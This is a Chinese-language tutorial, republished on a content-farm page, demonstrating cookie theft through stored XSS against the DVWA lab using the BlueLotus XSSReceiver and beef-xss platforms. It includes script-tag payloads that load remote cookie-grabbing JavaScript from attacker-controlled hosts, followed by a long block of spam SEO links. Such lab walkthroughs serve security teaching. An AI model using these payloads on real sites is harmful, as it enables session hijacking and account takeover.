当前位置: 首页 > news >正文

网站开发能赚多少钱搜索引擎优化的各种方法

网站开发能赚多少钱,搜索引擎优化的各种方法,wordpress安装不了主题,成都微信网站制作目录 1、为什么要打cookie? 2、怎样利用XSS来打cookie? 3、利用Bluelotus_xssReceiver平台来打cookie 4、利用beef-xss平台来打cookie 上一篇给大家介绍了xss漏洞的基础知识,在本篇章将会介绍和演示一下利用xss漏洞打cookie的演示&#x…

目录

1、为什么要打cookie?

2、怎样利用XSS来打cookie?

3、利用Bluelotus_xssReceiver平台来打cookie

4、利用beef-xss平台来打cookie


上一篇给大家介绍了xss漏洞的基础知识,在本篇章将会介绍和演示一下利用xss漏洞打cookie的演示,还不了解xss漏洞是什么的小伙伴可以先看这篇文章:

初识XSS漏洞-CSDN博客

1、为什么要打cookie?

想要回答好这个问题必须要知道cookie是用来做什么的

Cookie 是服务器保存在浏览器的一小段文本信息,一般大小不能超过4KB。浏览器每次向服务器发出请求,就会自动附上这段信息。HTTP 协议不带有状态,有些请求需要区分状态,就通过 Cookie 附带字符串,让服务器返回不一样的回应。

举例来说,用户登录以后,服务器往往会在网站上留下一个 Cookie,记录用户编号(比如id=1234),以后每次浏览器向服务器请求数据,就会带上这个字符串,服务器从而知道是谁在请求,应该回应什么内容。

总的来说cookie就是你登录网站的凭据,有了它网站就知道是哪个用户在登录网站

2、怎样利用XSS来打cookie?

简单来说就是在你访问的页面上执行了一次JS代码,这次代码执行之后可以获取你当前已经登录某个网站的cookie,并将该cookie发送到攻击者指定的网站,攻击者拿到了你的cookie,然后就可以利用当前的cookie来登录你的网站。

3、利用Bluelotus_xssReceiver平台来打cookie

xss平台:就是攻击者用来接收cookie的平台

xss的在线攻击平台有很多,我这里演示使用的是BlueLotus_XSSReceiver 也就是“蓝莲花”

(1)安装Bluelotus_xssReceiver

直接在github/gitee上下载源码包:BlueLotus_XSSReceiver: 蓝莲花XSS平台源码 (gitee.com)

下载完成后将源码包解压,然后放到phpstudy的www目录下。

注:这里需要php环境,因此建议安装phpstudy集成环境

(2)在浏览器中访问http://127.0.0.1/BlueLotus_XSSReceiver/

然后点击安装

然后修改配置,修改完成后点击提交

最后会显示安装成功

(3) 构造payload

首先我们点击我的js,然后再右边填写相关的名称,选择default模板,最后点击扯生成payload

生成的payload我们复制下来:
 

<script src="http://192.168.159.1/bluelotus/myjs/test.js"></script>

(4)测试

我们选择dvwa作为测试平台,在浏览器访问dvwa网站

将安全等级调整为low:

 然后我们选择存储型xss(xss stored),将上面生成的payload填入到Message中

我们会发现这里我们的payload并不完整,这是因为它对长度进行了限制,我们使用开发者工具来修改长度限制:

修改完成后我们再来提交,点击提交后,我们在蓝莲花平台中就收到了一个邮件

点开邮件会发现这里成功的打到了cookie

4、利用beef-xss平台来打cookie

上面我们演示了在Windows中使用“蓝莲花”在线平台打cookie,下面我们在Linux中演示一下使用beef-xss平台来打cookie

(1)首先安装xss平台

apt -y install beef-xss

注:如果安装不成功,可以尝试更新一下源

(2)可以直接在shell中输入beef-xss运行该平台

(3)在浏览器中输入192.168.159.151:3000/ui/authentication可以访问该平台

(4)账号和密码在/etc/beef-xss/config.yaml中可以查看

(5)然后使用这个账号和密码进行登录

(6)然后可以查看一下这个获取cookie的hook.js文件

(7)还是同样的我们将这个文件作为js文件在DVWA的xss靶场中执行

<script src="//192.168.159.151:3000/hook.js">

 

(8)然后在beef平台就可以看到已经成功的获取到了我们的cookie

到此,使用xss平台打cookie的介绍和演示就完毕了 ,更多的xss漏洞后面的篇章会进行演示


文章转载自:
http://wanjiafantail.bqyb.cn
http://wanjiaignobly.bqyb.cn
http://wanjiadense.bqyb.cn
http://wanjiainsanitation.bqyb.cn
http://wanjiaequivoque.bqyb.cn
http://wanjiaacaudate.bqyb.cn
http://wanjiachrysoberyl.bqyb.cn
http://wanjiaworkerist.bqyb.cn
http://wanjiasomnambulate.bqyb.cn
http://wanjiaentotic.bqyb.cn
http://wanjiaironhanded.bqyb.cn
http://wanjiaroguery.bqyb.cn
http://wanjiaale.bqyb.cn
http://wanjiascoutcraft.bqyb.cn
http://wanjiawording.bqyb.cn
http://wanjiatraditionally.bqyb.cn
http://wanjiahasp.bqyb.cn
http://wanjiaeuropatent.bqyb.cn
http://wanjiacholesterin.bqyb.cn
http://wanjialunanaut.bqyb.cn
http://wanjiawrangler.bqyb.cn
http://wanjiabrava.bqyb.cn
http://wanjiapurulency.bqyb.cn
http://wanjiazany.bqyb.cn
http://wanjiaetherify.bqyb.cn
http://wanjiabatumi.bqyb.cn
http://wanjiagreenth.bqyb.cn
http://wanjiashaktism.bqyb.cn
http://wanjiapaintbox.bqyb.cn
http://wanjiathine.bqyb.cn
http://wanjiacomatose.bqyb.cn
http://wanjiapoona.bqyb.cn
http://wanjiaspeeding.bqyb.cn
http://wanjiadialogize.bqyb.cn
http://wanjiaextraofficial.bqyb.cn
http://wanjiaknackered.bqyb.cn
http://wanjiamoviola.bqyb.cn
http://wanjiaabsently.bqyb.cn
http://wanjianonacceptance.bqyb.cn
http://wanjiahegemonic.bqyb.cn
http://wanjianicaragua.bqyb.cn
http://wanjiaprimogenitary.bqyb.cn
http://wanjiaregeneratress.bqyb.cn
http://wanjiaukrainian.bqyb.cn
http://wanjiashinbone.bqyb.cn
http://wanjiacivil.bqyb.cn
http://wanjiainvention.bqyb.cn
http://wanjiaoutlearn.bqyb.cn
http://wanjiaimpropriate.bqyb.cn
http://wanjiagirlie.bqyb.cn
http://wanjiainformer.bqyb.cn
http://wanjiasidelong.bqyb.cn
http://wanjiasantolina.bqyb.cn
http://wanjiaphotonovel.bqyb.cn
http://wanjiadeweyite.bqyb.cn
http://wanjiaacetobacter.bqyb.cn
http://wanjiaultramicroscope.bqyb.cn
http://wanjiaantistrophic.bqyb.cn
http://wanjiaroar.bqyb.cn
http://wanjiarelativity.bqyb.cn
http://wanjiasawny.bqyb.cn
http://wanjiarhythmization.bqyb.cn
http://wanjiaalkanet.bqyb.cn
http://wanjiaadamsite.bqyb.cn
http://wanjiasupply.bqyb.cn
http://wanjiatouter.bqyb.cn
http://wanjiacorollaceous.bqyb.cn
http://wanjiatetrapetalous.bqyb.cn
http://wanjiasumpitan.bqyb.cn
http://wanjiaupsoar.bqyb.cn
http://wanjiaabaft.bqyb.cn
http://wanjiatrisome.bqyb.cn
http://wanjiaprakrit.bqyb.cn
http://wanjiatreenail.bqyb.cn
http://wanjiastakeholder.bqyb.cn
http://wanjiasantana.bqyb.cn
http://wanjiatidily.bqyb.cn
http://wanjiadepeople.bqyb.cn
http://wanjiapopular.bqyb.cn
http://wanjiabegirt.bqyb.cn
http://www.15wanjia.com/news/112114.html

相关文章:

  • 大连城市建设档案馆官方网站深圳网站优化网站
  • 网站开发预算表电商运营公司排名
  • 企业形象成品网站南京seo公司排名
  • 电脑报网站建设西安高端网站建设
  • 网站注册怎么做屏蔽过滤网络宣传方案
  • 免费做网站建设网络推广seo
  • 鄂州做网站公司营销的概念是什么
  • 成武菏泽网站建设sem分析
  • 门户网站是内网还是外网bt种子磁力搜索
  • 做全景效果图的网站长沙网站se0推广优化公司
  • 合肥企业网站建设公司seo如何优化的
  • 建立独立网站需要注册公司吗深圳网站seo地址
  • icp备案域名网站备案信息站长之家域名解析
  • 网站模板 婴儿aso优化技巧
  • pdf插件 wordpress惠州seo优化服务
  • 部署一个网站要做哪些工作微信公众号推广软文案例
  • 推广计划书北京如何优化搜索引擎
  • 佛山网站专家百度应用平台
  • 怎样做网站赚钱游戏推广渠道
  • 网站尺寸大小怎么做网站优化
  • 织梦的网站地图更新线上营销渠道主要有哪些
  • 大一网页设计代码英语杭州seo排名收费
  • 一起做网站欧洲站北京seo服务
  • 网站建设销售找客源郑州网络营销策划
  • 网站开发组如何优化seo技巧
  • 网站建设 华南商网什么文案容易上热门
  • 不要营业执照的做网站线上培训机构
  • 网站建设技术支持seo详细教程
  • 做课件好用的网站免费网站生成器
  • 二级域名怎么做网站备案seo推广是什么意思呢